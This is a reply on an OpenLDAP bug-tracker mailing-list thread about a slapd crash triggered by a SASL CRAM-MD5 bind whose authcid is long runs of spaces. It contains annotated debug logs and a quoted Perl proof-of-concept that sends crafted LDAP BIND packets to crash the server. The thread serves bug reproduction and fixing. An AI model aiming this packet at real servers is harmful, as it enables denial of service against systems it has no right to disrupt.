[Date Prev][Date Next]
[Chronological]
[Thread]
[Top]
Re: (ITS#4740) SASL bind assert
From the provided log, looks like it's a SASL/CRAM-MD5
authentication with lots of spaces in the authcid.
Logs:
>>>> dnPrettyNormal: <>
><<< dnPrettyNormal: <>, <>
>do_sasl_bind: dn () mech CRAM-MD5
empty bind DN
>==> sasl_bind: dn="" mech=<continuing> datalen=1024
>SASL Canonicalize [conn=21]:
>authcid="
>"
authcid of spaces.
>slap_sasl_getdn: conn 21
>id=
>[len=255]
255 spaces.
>=> ldap_dn2bv(16)
><=
>ldap_dn2bv(uid=\20
>\20,cn=CRAM-MD5,cn=auth)=0
>slap_sasl_getdn: u:id converted to
>uid=\20
>\20,cn=CRAM-MD5,cn=auth
OKAY.
>>>> dnNormalize:
><uid=\20
>\20,cn=CRAM-MD5,cn=auth>
>=>
>ldap_bv2dn(uid=\20
>\20,cn=CRAM-MD5,cn=auth,0)
><=
>ldap_bv2dn(uid=\20
>\20,cn=CRAM-MD5,cn=auth)=0
>=> ldap_dn2bv(272)
><= ldap_dn2bv(uid=\20,cn=cram-md5,cn=auth)=0
BAD! We lost 254 spaces (last of which was escaped).
><<< dnNormalize: <uid=\20,cn=cram-md5,cn=auth>
>==>slap_sasl2dn: converting SASL name uid=\20,cn=cram-md5,cn=auth to a DN
>slap_authz_regexp: converting SASL name uid=\20,cn=cram-md5,cn=auth
><==slap_sasl2dn: Converted SASL name to <nothing>
>SASL Canonicalize [conn=21]: slapAuthcDN="uid=\20,cn=cram-md5,cn=auth"
>
At 07:13 PM 11/27/2006, hyc@symas.com wrote:
>bthomas@google.com wrote:
>> ------=_Part_8120_20176863.1164676496288
>> Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>> Content-Transfer-Encoding: 7bit
>> Content-Disposition: inline
>>
>> Hello,
>>
>> It would appear from my testing that this bug is not fixed. I have compiled
>> and installed 2.3.30 and verified that my version of getdn.c (1.124.2.5) has
>> the fixes that were introduced in 1.134. However, a nessus scan that
>> attempts to exploit this bug still succeeds in crashing slapd, with debug
>> output attached below (I've snipped the actual data passsed in, suffice to
>> say it's 255 0x20's).
>>
>> I'm happy to provide any other information as needed. I've taken a look at
>> the diffs but haven't been able to find what the problem is.
>
>This is the perl script I used to verify the bug here. slapd works fine
>for me with this. If you can tell us how to reproduce the crash, we can
>investigate further.
>
>use IO::Socket;
>
> my $host = "localhost";
> my $port = 9011;
>
> my $sock = IO::Socket::INET->new(
> Proto => "tcp",
> PeerAddr => $host,
> PeerPort => $port, )
> or die "Error creating socket";
>
> print "Sending LDAP BIND request...\n";
>
> my
>$s="\x30\x17\x02\x02\x04\xe7\x60\x11\x02\x01\x03\x04\x00\xa3\x0a\x04";
> $s .= "\x08\x43\x52\x41\x4d\x2d\x4d\x44\x35";
> print $sock $s;
>
> my $buf = ' ';
> read( $sock, $buf, 24 );
>
> $s =
>"\x30\x82\x04\x1f\x02\x02\x04\xe6\x60\x82\x04\x17\x02\x01\x03\x04";
> $s .=
>"\x00\xa3\x82\x04\x0e\x04\x08\x43\x52\x41\x4d\x2d\x4d\x44\x35\x04";
> $s .= "\x82\x04\x00";
> $s .= "\x20" x 1024;
>
> print "Sending second LDAP BIND request...\n";
>
> print $sock $s;
> close $sock;
>
> print "Done\n";
>
>--
> -- Howard Chu
> Chief Architect, Symas Corp. http://www.symas.com
> Director, Highland Sun http://highlandsun.com/hyc
> OpenLDAP Core Team http://www.openldap.org/project/